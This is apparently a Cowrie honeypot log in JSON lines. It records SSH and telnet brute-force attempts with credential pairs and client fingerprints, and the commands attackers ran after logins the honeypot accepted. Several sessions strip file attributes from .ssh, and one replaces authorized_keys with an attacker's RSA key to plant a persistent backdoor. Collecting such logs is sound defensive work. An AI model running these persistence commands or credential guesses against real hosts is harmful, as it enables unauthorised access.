{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:38.938988Z","src_ip":"212.227.235.229","session":"16311c3d4bef"}
{"eventid":"cowrie.login.failed","username":"test2","password":"root123","message":"login attempt [test2/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:39.327753Z","src_ip":"212.227.235.229","session":"7ceb67553f3d"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:41.254888Z","src_ip":"212.227.235.229","session":"7ceb67553f3d"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57672,"dst_ip":"1.2.3.4","dst_port":22,"session":"df52690dd9cd","protocol":"ssh","message":"New connection: 43.159.36.188:57672 (1.2.3.4:22) [session: df52690dd9cd]","sensor":"my-vps","timestamp":"2025-08-31T05:50:41.781440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:50:41.782198Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:50:42.026815Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.login.success","username":"root","password":"free","message":"login attempt [root/free] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:50:43.044214Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:50:43.553314Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:50:43.554096Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:50:43.555518Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:43.800976Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:50:44.350435Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:50:44.351151Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:50:44.597741Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:44.598598Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":39602,"dst_ip":"1.2.3.4","dst_port":22,"session":"d00db48d131a","protocol":"ssh","message":"New connection: 43.159.36.188:39602 (1.2.3.4:22) [session: d00db48d131a]","sensor":"my-vps","timestamp":"2025-08-31T05:50:44.841725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:50:44.842622Z","src_ip":"43.159.36.188","session":"d00db48d131a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:50:45.087158Z","src_ip":"43.159.36.188","session":"d00db48d131a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:46.110912Z","src_ip":"43.159.36.188","session":"d00db48d131a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:47.358192Z","src_ip":"43.159.36.188","session":"d00db48d131a"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":39610,"dst_ip":"1.2.3.4","dst_port":22,"session":"681f8eef6532","protocol":"ssh","message":"New connection: 43.159.36.188:39610 (1.2.3.4:22) [session: 681f8eef6532]","sensor":"my-vps","timestamp":"2025-08-31T05:50:47.608060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:50:47.609031Z","src_ip":"43.159.36.188","session":"681f8eef6532"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:50:47.858949Z","src_ip":"43.159.36.188","session":"681f8eef6532"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:50:48.861672Z","src_ip":"43.159.36.188","session":"681f8eef6532"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:49.113636Z","src_ip":"43.159.36.188","session":"df52690dd9cd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:49.114709Z","src_ip":"43.159.36.188","session":"681f8eef6532"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56004,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e8381c9a6c0","protocol":"ssh","message":"New connection: 212.227.125.160:56004 (1.2.3.4:22) [session: 1e8381c9a6c0]","sensor":"my-vps","timestamp":"2025-08-31T05:50:49.141342Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38702,"dst_ip":"1.2.3.4","dst_port":22,"session":"92c38de449a5","protocol":"ssh","message":"New connection: 212.227.125.160:38702 (1.2.3.4:22) [session: 92c38de449a5]","sensor":"my-vps","timestamp":"2025-08-31T05:50:53.649777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:50:54.059601Z","src_ip":"212.227.125.160","session":"92c38de449a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:50:54.060505Z","src_ip":"212.227.125.160","session":"92c38de449a5"}
{"eventid":"cowrie.login.failed","username":"test2","password":"root123","message":"login attempt [test2/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:50:55.895916Z","src_ip":"212.227.125.160","session":"92c38de449a5"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:50:57.512001Z","src_ip":"212.227.125.160","session":"92c38de449a5"}
{"eventid":"cowrie.session.connect","src_ip":"120.27.154.152","src_port":10277,"dst_ip":"1.2.3.4","dst_port":22,"session":"21f786f61153","protocol":"ssh","message":"New connection: 120.27.154.152:10277 (1.2.3.4:22) [session: 21f786f61153]","sensor":"my-vps","timestamp":"2025-08-31T05:50:58.763654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:50:58.882500Z","src_ip":"212.227.125.160","session":"1e8381c9a6c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:50:58.883326Z","src_ip":"212.227.125.160","session":"1e8381c9a6c0"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":60942,"dst_ip":"1.2.3.4","dst_port":22,"session":"8360b448a1f9","protocol":"ssh","message":"New connection: 170.64.166.123:60942 (1.2.3.4:22) [session: 8360b448a1f9]","sensor":"my-vps","timestamp":"2025-08-31T05:51:03.263640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:03.264720Z","src_ip":"170.64.166.123","session":"8360b448a1f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:03.540635Z","src_ip":"170.64.166.123","session":"8360b448a1f9"}
{"eventid":"cowrie.login.failed","username":"user","password":"1qaz#EDC","message":"login attempt [user/1qaz#EDC] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:04.685199Z","src_ip":"170.64.166.123","session":"8360b448a1f9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:05.963005Z","src_ip":"170.64.166.123","session":"8360b448a1f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33482,"dst_ip":"1.2.3.4","dst_port":22,"session":"8720f83abdfb","protocol":"ssh","message":"New connection: 212.227.235.229:33482 (1.2.3.4:22) [session: 8720f83abdfb]","sensor":"my-vps","timestamp":"2025-08-31T05:51:09.199091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:09.199915Z","src_ip":"212.227.235.229","session":"8720f83abdfb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:09.457863Z","src_ip":"212.227.235.229","session":"8720f83abdfb"}
{"eventid":"cowrie.login.failed","username":"joao","password":"joao@123","message":"login attempt [joao/joao@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:51:10.525000Z","src_ip":"212.227.235.229","session":"8720f83abdfb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:51:11.784227Z","src_ip":"212.227.235.229","session":"8720f83abdfb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33246,"dst_ip":"1.2.3.4","dst_port":22,"session":"4def01f8f371","protocol":"ssh","message":"New connection: 212.227.235.229:33246 (1.2.3.4:22) [session: 4def01f8f371]","sensor":"my-vps","timestamp":"2025-08-31T05:51:14.313923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:51:14.314563Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38034,"dst_ip":"1.2.3.4","dst_port":22,"session":"92ca25f17726","protocol":"ssh","message":"New connection: 212.227.235.229:38034 (1.2.3.4:22) [session: 92ca25f17726]","sensor":"my-vps","timestamp":"2025-08-31T05:51:14.440655Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:51:14.603842Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass@2024","message":"login attempt [root/Pass@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:51:15.803985Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57629,"dst_ip":"1.2.3.4","dst_port":23,"session":"aab9aac7384f","protocol":"telnet","message":"New connection: 212.227.235.229:57629 (1.2.3.4:23) [session: aab9aac7384f]","sensor":"my-vps","timestamp":"2025-08-31T05:51:16.284597Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44030,"dst_ip":"1.2.3.4","dst_port":23,"session":"0478a1518a47","protocol":"telnet","message":"New connection: 212.227.235.229:44030 (1.2.3.4:23) [session: 0478a1518a47]","sensor":"my-vps","timestamp":"2025-08-31T05:51:16.306864Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:51:16.783937Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:16.784602Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:51:16.785611Z","src_ip":"212.227.235.229","session":"4def01f8f371"}
